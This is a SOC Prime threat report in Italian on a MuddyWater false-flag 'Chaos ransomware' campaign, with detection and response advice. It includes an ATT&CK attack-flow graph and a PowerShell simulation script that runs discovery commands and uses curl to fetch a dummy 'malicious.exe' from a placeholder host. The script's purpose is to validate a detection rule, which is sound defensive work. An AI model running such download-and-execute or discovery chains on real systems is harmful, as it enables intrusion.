Caos Ransomware e la Minaccia Supportata dallo Stato Dietro di Esso

SOC Prime Team

Segui

Caos Ransomware e la Minaccia Supportata dallo Stato Dietro di Esso

Detection stack

AIDR
Alert
ETL
Query

Rapporto
Flusso di Attacco
Rilevamenti
Simulazioni

Sommario

All’inizio del 2026, quello che sembrava essere un normale incidente di ransomware Chaos è stato successivamente identificato come un’operazione di false-flag legata al gruppo statale iraniano MuddyWater, noto anche come Seedworm. Invece di concentrarsi sulla crittografia dei file, gli attaccanti hanno utilizzato Microsoft Teams per l’ingegneria sociale, hanno rubato credenziali e token MFA e hanno distribuito un downloader personalizzato insieme a un trojan di accesso remoto. L’operazione ha riutilizzato l’infrastruttura associata a MuddyWater, inclusi un certificato di firma del codice, ed era orientata al furto di dati e all’accesso persistente a lungo termine.

Indagine

Gli investigatori di Rapid7 hanno ricostruito la catena di intrusione dal furto di credenziali basato su Teams all’uso di strumenti di amministrazione remota legittimi come AnyDesk e DWAgent, seguito dalla consegna di ms_upd.exe, che ha recuperato un RAT personalizzato chiamato Game.exe. Il team ha identificato domini di comando e controllo, inclusi moonzonet.com and uploadfiler.com, insieme a più indirizzi IP associati e un certificato di firma precedentemente collegato a MuddyWater. L’analisi del malware ha anche rivelato comportamenti di anti-analisi, un mutex utilizzato per imporsi come esecuzione singola, e meccanismi di persistenza che coinvolgono un servizio e file nascosti.

Mitigazione

Le organizzazioni dovrebbero applicare protezioni MFA più forti, limitare l’accesso remoto al desktop e la condivisione dello schermo di Teams solo a account fidati e monitorare l’uso di strumenti di accesso remoto legittimi in contesti insoliti. Dovrebbe essere applicata una lista di permessi per i binari firmati con codice e l’esecuzione di file non firmati da directory accessibili agli utenti dovrebbe essere bloccata. I team di sicurezza dovrebbero anche controllare regolarmente l’uso dei certificati e bloccare i domini e gli indirizzi IP dannosi noti legati alla campagna.

Risposta

Se questa attività viene rilevata, isola immediatamente i sistemi interessati, revoca le credenziali compromesse e i token MFA, e inizia la raccolta completa forense. L’infrastruttura di comando e controllo identificata dovrebbe essere bloccata, i servizi AnyDesk e DWAgent dovrebbero essere rimossi e il RAT personalizzato dovrebbe essere eliminato dall’ambiente. Dovrebbe essere condotta anche una caccia alla minaccia per il mutex ATTRIBUTES_ObjectKernel e per eventuali file rimanenti memorizzati sotto ProgramData.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#aaffaa classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes u2013 Actions action_initial_access["Azione – T1566 Phishing L’avversario ha inviato messaggi di chat dannosi di Microsoft Teams che hanno attirato gli utenti in una sessione di condivisione schermo di Quick Assist falso."] class action_initial_access action action_user_exec_link["Azione – T1204.001 Esecuzione Utente: Link Malevolo Le vittime hanno cliccato su un link dannoso consegnato via Teams che ha avviato il download di ms_upd.exe."] class action_user_exec_link action action_user_exec_copypaste["Azione – T1204.004 Esecuzione Utente: Copia e Incolla Malevolo Gli attaccanti hanno istruito gli utenti a copiare-incollare le credenziali in file di testo creati localmente."] class action_user_exec_copypaste action action_cred_access["Azione – T1552.008 Credenziali Non Sicure & T1078 Account Validati Credenziali raccolte dai messaggi di chat e utilizzate per accedere ai sistemi interni."] class action_cred_access action action_auth_mod["Azione – T1556.001 Autenticazione Controller di Dominio Le credenziali compromesse sono state utilizzate per autenticarsi al controller di dominio ottenendo accesso privilegiato."] class action_auth_mod action action_discovery["Azione – T1082 Scoperta Informazioni di Sistema & T1016 Scoperta Configurazione Rete di Sistema Il malware ha raccolto nome host, nome utente, dominio, indirizzo IP via ipconfig, whoami, ecc."] class action_discovery action action_ingress_transfer["Azione – T1105 Trasferimento Strumenti Ingress ms_upd.exe ha scaricato payload aggiuntivi (WebView2Loader.dll, Game.exe, visualwincomp.txt) usando curl."] class action_ingress_transfer action action_execution["Azione – T1059 Interprete di Comandi e Script L’attaccante ha eseguito cmd.exe, PowerShell e pythonw.exe per eseguire i binari scaricati."] class action_execution action action_process_injection["Azione – T1055.011 Iniezione Memoria Finestra Supplementare & T1055.002 Iniezione Portable Executable pythonw.exe ha iniettato codice in processi sospesi per lanciare furtivamente il RAT."] class action_process_injection action action_defense_evasion["Azione – T1027 File o Informazioni Offuscati & T1497 Evasione Virtualizzazione/Sandbox Payload codificati in XOR, AES-256-GCM criptati; controllo di DLL di analisi, identificatori VM e timing per evitare rilevamenti da sandbox."] class action_defense_evasion action action_persistence["Azione – T1219 Strumenti di Accesso Remoto Distribuzione del servizio DWAgent e di AnyDesk per il controllo remoto a lungo termine."] class action_persistence action action_lateral_movement["Azione – T1563 Dirottamento Sessione di Servizio Remoto (RDP) & T1668 Controllo Esclusivo Utilizzate sessioni RDP legittime per spostarsi lateralmente ed eseguire comandi su host aggiuntivi."] class action_lateral_movement action action_collection_exfil["Azione – T1560 Archiviazione Dati Raccolti & T1041 Esfiltrazione su Canale C2 Dati archiviati in archivio XOR-cifrato e caricati su uploadfiler.com."] class action_collection_exfil action action_c2["Azione – T1090 Proxy & T1573 Canale Criptato Comunicazione con l’infrastruttura C2 (moonzonet.com, uploadfiler.com) su HTTPS con payload criptati."] class action_c2 action %% Nodes u2013 Tools / Files / Processes / Malware file_ms_upd["File – Nome: ms_upd.exe Descrizione: Dropper iniziale che recupera ulteriori payload."] class file_ms_upd file file_webview ["File – Nome: WebView2Loader.dll Descrizione: DLL di supporto per il rendering di contenuti web."] class file_webview file file_game["File – Nome: Game.exe Descrizione: Payload secondario eseguito dopo il download."] class file_game file file_visual["File – Nome: visualwincomp.txt Descrizione: File di testo usato per i dati di configurazione."] class file_visual file process_cmd["Processo – Nome: cmd.exe Scopo: Esegue istruzioni da riga di comando."] class process_cmd process process_ps["Processo – Nome: PowerShell Scopo: Esegue script PowerShell per l’esecuzione di payload."] class process_ps process process_python["Processo – Nome: pythonw.exe Scopo: Esegue componenti basati su Python e svolge iniezioni di processo."] class process_python process malware_dwaga["Malware – Nome: Servizio DWAgent Scopo: Fornisce accesso remoto persistente."] class malware_dwaga malware tool_anydesk["Strumento – Nome: AnyDesk Descrizione: Utility legittima di desktop remoto utilizzata per persistenza e movimento laterale."] class tool_anydesk tool %% Connections u2013 Flow action_initial_access –>|porta a| action_user_exec_link action_user_exec_link –>|scarica| file_ms_upd action_user_exec_link –>|porta a| action_user_exec_copypaste action_user_exec_copypaste –>|fornisce| action_cred_access action_cred_access –>|abilita| action_auth_mod action_auth_mod –>|abilita| action_discovery action_discovery –>|avvia| action_ingress_transfer action_ingress_transfer –>|scarica| file_webview action_ingress_transfer –>|scarica| file_game action_ingress_transfer –>|scarica| file_visual action_ingress_transfer –>|porta a| action_execution action_execution –>|esegue| process_cmd action_execution –>|esegue| process_ps action_execution –>|esegue| process_python process_python –>|inietta| action_process_injection action_process_injection –>|facilita| action_defense_evasion action_defense_evasion –>|abilita| action_persistence action_persistence –>|installa| malware_dwaga action_persistence –>|installa| tool_anydesk malware_dwaga –>|supporta| action_lateral_movement tool_anydesk –>|supporta| action_lateral_movement action_lateral_movement –>|raccoglie| action_collection_exfil action_collection_exfil –>|esfiltra tramite| action_c2 %% Styling class action_initial_access,action_user_exec_link,action_user_exec_copypaste,action_cred_access,action_auth_mod,action_discovery,action_ingress_transfer,action_execution,action_process_injection,action_defense_evasion,action_persistence,action_lateral_movement,action_collection_exfil,action_c2 action class file_ms_upd,file_webview,file_game,file_visual file class process_cmd,process_ps,process_python process class malware_dwaga malware class tool_anydesk tool "

Flusso dell’Attacco

Narrativa dell’Attacco & Comandi:
1. Stabilire un punto d’appoggio remoto utilizzando lo strumento di gestione remota legittimo AnyDesk.exe (rispecchiando il selettore “remote-tool”).
2. Esegui ricognizione di rete eseguendo ipconfig and whoami dalla stessa sessione – soddisfacendo il selettore “comando di scoperta”.
3. Scaricare un carico utile dannoso utilizzando curl inviato attraverso cmd.exe, una tecnica classica per “Trasferimento Strumenti Ingress” (T1105) e “Interfaccia Linea di Comando” (T1059).
4. Eseguire il payload per completare la kill-chain (non richiesto per la validazione della regola, ma incluso per realismo).

Script di Test di Regressione:

# -------------------------------------------------
# Script di Simulazione – attiva la regola Sigma
# -------------------------------------------------
# 1. Avvia AnyDesk (simulato – si assume che AnyDesk sia nel PATH)
Start-Process -FilePath "AnyDesk.exe" -ArgumentList "--no-sandbox" -WindowStyle Hidden

# 2. Esegui comandi di scoperta
$discovery = @(
    "ipconfig /all",
    "whoami",
    "net start"
)
foreach ($cmd in $discovery) {
    cmd.exe /c $cmd | Out-Null
}

# 3. Usa cmd.exe + curl per recuperare un payload dummy
$payloadUrl = "http://example.com/malicious.exe"
$outputPath = "$env:TEMPpayload.exe"
$downloadCmd = "curl $payloadUrl -o $outputPath"
cmd.exe /c $downloadCmd

# Facoltativo: Esegui il payload (commentato per sicurezza)
# Start-Process -FilePath $outputPath -WindowStyle Hidden
# -------------------------------------------------

Comandi di Pulizia:

# Termina AnyDesk se è stato avviato
Get-Process -Name "AnyDesk" -ErrorAction SilentlyContinue | Stop-Process -Force

# Rimuove il payload scaricato
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue

# Cancella eventuali istanze residue di cmd.exe create dallo script
Get-Process -Name "cmd" -ErrorAction SilentlyContinue | Stop-Process -Force

Fine del Rapporto

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilità sulle minacce più rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis